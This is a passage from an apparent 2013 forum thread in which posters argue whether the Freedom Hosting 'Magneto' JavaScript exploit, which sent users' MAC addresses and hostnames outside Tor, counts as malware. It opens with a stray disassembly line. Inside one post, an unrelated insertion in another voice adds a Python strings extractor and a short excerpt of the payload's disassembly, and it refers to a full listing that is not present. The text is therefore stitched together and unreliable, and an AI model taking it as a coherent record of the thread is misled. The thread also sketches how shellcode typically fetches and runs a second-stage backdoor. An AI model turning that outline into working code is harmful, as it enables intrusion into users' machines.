000003BB  90                nop

Title: Re: A warning about antivirus programs
Post by: royalblue on August 11, 2013, 04:10 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by Freedom Hosting.

The OP discusses malware downloaded via a Java app exploit. A JS exploit did not seem to be the case based on the information provided in the OP. I stand by that statement.

Freedom Hosting is a different story; obviously it was a js exploit, but I've seen no evidence that there was malware delivered by javascript as you are contending. It was an exploit made possible by javascript. Where's the malware???

The malware is what gathered users' hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.

If malware is defined as any computer instruction code designed for a malicious purpose, then sure, you can call that malware. It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction, though.

In regards to the assembly code you quote: where was this encoded in the script? Magneto?
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 04:30 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by Freedom Hosting.

The OP discusses malware downloaded via a Java app exploit. A JS exploit did not seem to be the case based on the information provided in the OP. I stand by that statement.

Freedom Hosting is a different story; obviously it was a js exploit, but I've seen no evidence that there was malware delivered by javascript as you are contending. It was an exploit made possible by javascript. Where's the malware???

The malware is what gathered users' hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.

If malware is defined as any computer instruction code designed for a malicious purpose, then sure, you can call that malware. It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction, though.

In regards to the assembly code you quote: where was this encoded in the script? Magneto?

It is entirely possible for server-side javascript to cause a compiled piece of software to be executed on a remote machine, via a browser exploit. This assembly code could have very well been used to download a secondary payload from an FBI server; the secondary payload could have been a program written in C, and after downloading it, it could have executed it and infected the system with a persistent backdoor. That is very common for hackers to do: a javascript exploit injects assembly code into the target computer's memory and executes it, and the assembly code downloads a secondary payload from the internet and executes it. The FBI didn't do that because they didn't need to and might have been restricted by the court from doing so; instead they just used an assembly program that gathers the MAC address and hostname and sends it to a server outside of Tor.

Yeah, it was encoded in Magneto. I would call it malware because it compromised user security. I don't know what your definition of malware is, but if it requires a persistent infection, then it could have been delivered by this attack as well: Magneto would have just downloaded a secondary, more complex compiled program and executed it.
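As an added example (my code, not anything from the thread or from the Magneto payload), a small Python helper that turns an excerpt of the ndisasm listing quoted above back into raw bytes and pulls out the printable runs, the way an analyst checks whether a "code" region is really data. On this excerpt it recovers the Cookie header fragment and the names of the two DLLs the shellcode resolves, ws2_32 (sockets) and IPHLPAPI (adapter and MAC address lookups).

```python
import re
import string

# Constructed sample: a contiguous excerpt copied from the ndisasm listing quoted above.
LISTING = """\
000002CB  0D0A436F6F        or eax,0x6f6f430a
000002D0  6B69653A          imul ebp,[ecx+0x65],byte +0x3a
000002D4  204944            and [ecx+0x44],cl
000002D7  3D7773325F        cmp eax,0x5f327377
000002DC  3332              xor esi,[edx]
000002DE  004950            add [ecx+0x50],cl
000002E1  48                dec eax
000002E2  4C                dec esp
000002E3  50                push eax
000002E4  41                inc ecx
000002E5  50                push eax
000002E6  49                dec ecx
000002E7  0002              add [edx],al
"""

# address column, then the hex byte column; the mnemonic after it is ignored
LINE_RE = re.compile(r"^\s*[0-9A-Fa-f]{8}\s+([0-9A-Fa-f]+)\s")

def listing_to_bytes(listing):
    """Join the hex column of every listing line, in order."""
    out = bytearray()
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if m:
            out += bytes.fromhex(m.group(1))
    return bytes(out)

# CR, LF and TAB count as printable so an HTTP header template stays in one run.
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}

def extract_strings(data, min_len=4):
    """Return every run of printable bytes at least min_len long (what `strings` does)."""
    found, run = [], bytearray()
    for b in data + b"\x00":  # trailing sentinel flushes the last run
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found

if __name__ == "__main__":
    print(extract_strings(listing_to_bytes(LISTING)))
```

Run over the whole listing instead of the excerpt, the same two functions also recover the Accept headers and the GET request line with its UUID path.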
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 04:33 pm
Just as a side discussion, I think it is kind of shocking how many javascript developers I meet who think that javascript absolutely cannot be used to infect computers, that it is totally safe, cannot cause malware infections, etc. It is a really common belief apparently, and it is weird considering that an enormous number of the attacks against browsers are javascript-based.
Title: Re: A warning about antivirus programs
Post by: royalblue on August 11, 2013, 05:38 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by Freedom Hosting.

The OP discusses malware downloaded via a Java app exploit. A JS exploit did not seem to be the case based on the information provided in the OP. I stand by that statement.

Freedom Hosting is a different story; obviously it was a js exploit, but I've seen no evidence that there was malware delivered by javascript as you are contending. It was an exploit made possible by javascript. Where's the malware???

The malware is what gathered users' hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.

If malware is defined as any computer instruction code designed for a malicious purpose, then sure, you can call that malware. It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction, though.

In regards to the assembly code you quote: where was this encoded in the script? Magneto?

It is entirely possible for server-side javascript to cause a compiled piece of software to be executed on a remote machine, via a browser exploit. This assembly code could have very well been used to download a secondary payload from an FBI server; the secondary payload could have been a program written in C, and after downloading it, it could have executed it and infected the system with a persistent backdoor. That is very common for hackers to do: a javascript exploit injects assembly code into the target computer's memory and executes it, and the assembly code downloads a secondary payload from the internet and executes it. The FBI didn't do that because they didn't need to and might have been restricted by the court from doing so; instead they just used an assembly program that gathers the MAC address and hostname and sends it to a server outside of Tor.

It's important to remember that a javascript exploit would be needed for code execution in either case.
Quote
Yeah, it was encoded in Magneto. I would call it malware because it compromised user security. I don't know what your definition of malware is, but if it requires a persistent infection, then it could have been delivered by this attack as well: Magneto would have just downloaded a secondary, more complex compiled program and executed it.

The Wikipedia definition of malware supports your definition.
Quote
Malware, short for malicious software, is software used or programmed by attackers to disrupt computer operation, gather sensitive information, or gain access to private computer systems.[1] It can appear in the form of code, scripts, active content, and other software.[2] 'Malware' is a general term used to refer to a variety of forms of hostile or intrusive software.[3]

Quote
Just as a side discussion, I think it is kind of shocking how many javascript developers I meet who think that javascript absolutely cannot be used to infect computers, that it is totally safe, cannot cause malware infections, etc. It is a really common belief apparently, and it is weird considering that an enormous number of the attacks against browsers are javascript-based.

Very true. Javascript itself is the biggest security threat when using a web browser. All users should be blocking scripts, not just in TBB but in your normal web browser as well.